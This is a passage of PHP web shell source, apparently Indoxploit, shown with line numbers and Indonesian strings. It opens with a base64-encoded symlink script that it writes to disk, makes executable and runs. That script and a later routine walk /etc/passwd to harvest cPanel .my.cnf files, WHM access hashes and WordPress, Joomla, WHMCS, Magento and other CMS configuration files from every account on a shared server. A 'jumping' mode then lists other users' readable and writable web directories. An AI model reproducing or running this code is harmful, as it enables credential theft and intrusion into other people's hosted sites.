mZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1ob21lLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3Mtc2l0ZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy90ZXN0L3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb28vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb28udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY21zL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1tYWluLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtaG9tZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmJ+Y29uZmlnLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIxfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0td2htY3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL1dITUNTL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNwYW5lbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VibWl0dGlja2V0LnBocCcsJHNpdGVzcy4nLXdobWNzMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW15c2hvcC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1aQ3Nob3AudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW1zL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJ0aWNsZS9jb25maWcucGhwJywkc2l0ZXNzLictTndhaHkudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy11cDIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlL2RiLnBocCcsJHNpdGVzcy4nLTcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29ubmVjdC5waHAnLCRzaXRlc3MuJy1QSFAtRnVzaW9uLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsJHNpdGVzcy4nLURydXBhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5ncy50eHQnKSA7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3JlcXVpcmVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1BTTRTUy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnRzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3QudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdHMvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmdzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RpbmdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxsaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RiaWxsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcC9ldGMvbG9jYWwueG1sJywkc2l0ZXNzLictTWFnZW50by50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictT3BlbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnL3NldHRpbmdzLmluYy5waHAnLCRzaXRlc3MuJy1QcmVzdGFzaG9wLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy9rb25la3NpLnBocCcsJHNpdGVzcy4nLUxva29tZWRpYS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9sb2tvbWVkaWEvY29uZmlnL2tvbmVrc2kucGhwJywkc2l0ZXNzLictTG9rb21lZGlhLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NsY29uZmlnLnBocCcsJHNpdGVzcy4nLVNpdGVsb2NrLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcGxpY2F0aW9uL2NvbmZpZy9kYXRhYmFzZS5waHAnLCRzaXRlc3MuJy1FbGxpc2xhYi50eHQnKTsNCn0NCnByaW50ICJMb2NhdGlvbjogLi9cblxuIjs=";
  591. $file = "idx_config/vhost.cin";
  592. $handle = fopen($file ,"w+");
  593. fwrite($handle ,base64_decode($vhost));
  594. fclose($handle);
  595. chmod($file, 0755);
  596. if(exe("cd idx_config && ./vhost.cin")) {
  597. echo "<center><a href='$link_config/idx_config'><font color=lime>Done</font></a></center>";
  598. } else {
  599. echo "<center><a href='$link_config/idx_config/vhost.cin'><font color=lime>Done</font></a></center>";
  600. }
  601.  
  602. } else {
  603. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  604. while($passwd = fgets($etc)) {
  605. if($passwd == "" || !$etc) {
  606. echo "<font color=red>Can't read /etc/passwd</font>";
  607. } else {
  608. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  609. foreach($user_config[1] as $user_idx) {
  610. $user_config_dir = "/home/$user_idx/public_html/";
  611. if(is_readable($user_config_dir)) {
  612. $grab_config = array(
  613. "/home/$user_idx/.my.cnf" => "cpanel",
  614. "/home/$user_idx/.accesshash" => "WHM-accesshash",
  615. "$user_config_dir/po-content/config.php" => "Popoji",
  616. "$user_config_dir/vdo_config.php" => "Voodoo",
  617. "$user_config_dir/bw-configs/config.ini" => "BosWeb",
  618. "$user_config_dir/config/koneksi.php" => "Lokomedia",
  619. "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
  620. "$user_config_dir/clientarea/configuration.php" => "WHMCS",
  621. "$user_config_dir/whm/configuration.php" => "WHMCS",
  622. "$user_config_dir/whmcs/configuration.php" => "WHMCS",
  623. "$user_config_dir/forum/config.php" => "phpBB",
  624. "$user_config_dir/sites/default/settings.php" => "Drupal",
  625. "$user_config_dir/config/settings.inc.php" => "PrestaShop",
  626. "$user_config_dir/app/etc/local.xml" => "Magento",
  627. "$user_config_dir/joomla/configuration.php" => "Joomla",
  628. "$user_config_dir/configuration.php" => "Joomla",
  629. "$user_config_dir/wp/wp-config.php" => "WordPress",
  630. "$user_config_dir/wordpress/wp-config.php" => "WordPress",
  631. "$user_config_dir/wp-config.php" => "WordPress",
  632. "$user_config_dir/admin/config.php" => "OpenCart",
  633. "$user_config_dir/slconfig.php" => "Sitelok",
  634. "$user_config_dir/application/config/database.php" => "Ellislab");
  635. foreach($grab_config as $config => $nama_config) {
  636. $ambil_config = file_get_contents($config);
  637. if($ambil_config == '') {
  638. } else {
  639. $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
  640. fputs($file_config,$ambil_config);
  641. }
  642. }
  643. }
  644. }
  645. }
  646. }
  647. echo "<center><a href='?dir=$dir/idx_config'><font color=lime>Done</font></a></center>";
  648. }
  649. } elseif($_GET['do'] == 'jumping') {
  650. $i = 0;
  651. echo "<div class='margin: 5px auto;'>";
  652. if(preg_match("/hsphere/", $dir)) {
  653. $urls = explode("\r\n", $_POST['url']);
  654. if(isset($_POST['jump'])) {
  655. echo "<pre>";
  656. foreach($urls as $url) {
  657. $url = str_replace(array("http://","www."), "", strtolower($url));
  658. $etc = "/etc/passwd";
  659. $f = fopen($etc,"r");
  660. while($gets = fgets($f)) {
  661. $pecah = explode(":", $gets);
  662. $user = $pecah[0];
  663. $dir_user = "/hsphere/local/home/$user";
  664. if(is_dir($dir_user) === true) {
  665. $url_user = $dir_user."/".$url;
  666. if(is_readable($url_user)) {
  667. $i++;
  668. $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  669. if(is_writable($url_user)) {
  670. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  671. }
  672. echo $jrw."<br>";
  673. }
  674. }
  675. }
  676. }
  677. if($i == 0) {
  678. } else {
  679. echo "<br>Total ada ".$i." Kamar di ".$ip;
  680. }
  681. echo "</pre>";
  682. } else {
  683. echo '<center>
  684. <form method="post">
  685. List Domains: <br>
  686. <textarea name="url" style="width: 500px; height: 250px;">';
  687. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  688. while($getss = fgets($fp)) {
  689. echo $getss;
  690. }
  691. echo '</textarea><br>
  692. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  693. </form></center>';
  694. }
  695. } elseif(preg_match("/vhosts|vhost/", $dir)) {
  696. preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
  697. $urls = explode("\r\n", $_POST['url']);
  698. if(isset($_POST['jump'])) {
  699. echo "<pre>";
  700. foreach($urls as $url) {
  701. $url = str_replace("www.", "", $url);
  702. $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
  703. if(is_dir($web_vh) === true) {
  704. if(is_readable($web_vh)) {
  705. $i++;
  706. $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  707. if(is_writable($web_vh)) {
  708. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  709. }
  710. echo $jrw."<br>";
  711. }
  712. }
  713. }
  714. if($i == 0) {
  715. } else {
  716. echo "<br>Total ada ".$i." Kamar di ".$ip;
  717. }
  718. echo "</pre>";
  719. } else {
  720. echo '<center>
  721. <form method="post">
  722. List Domains: <br>
  723. <textarea name="url" style="width: 500px; height: 250px;">';
  724. bing("ip:$ip");
  725. echo '</textarea><br>
  726. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  727. </form></center>';
  728. }
  729. } else {
  730. echo "<pre>";
  731. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  732. while($passwd = fgets($etc)) {
  733. if($passwd == '' || !$etc) {
  734. echo "<font color=red>Can't read /etc/passwd</font>";
  735. } else {
  736. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  737. foreach($user_jumping[1] as $user_idx_jump) {
  738. $user_jumping_dir = "/home/$user_idx_jump/public_html";
  739. if(is_readable($user_jumping_dir)) {
  740. $i++;
  741. $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  742. if(is_writable($user_jumping_dir)) {
  743. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  744. }
  745. echo $jrw;
  746. if(function_exists('posix_getpwuid')) {
  747. $domain_jump = file_get_contents("/etc/named.conf");
  748. if($domain_jump == '') {
  749. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  750. } else {
  751. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  752. foreach($domains_jump[1] as $dj) {
  753. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  754. $user_jumping_url = $user_jumping_url['name'];
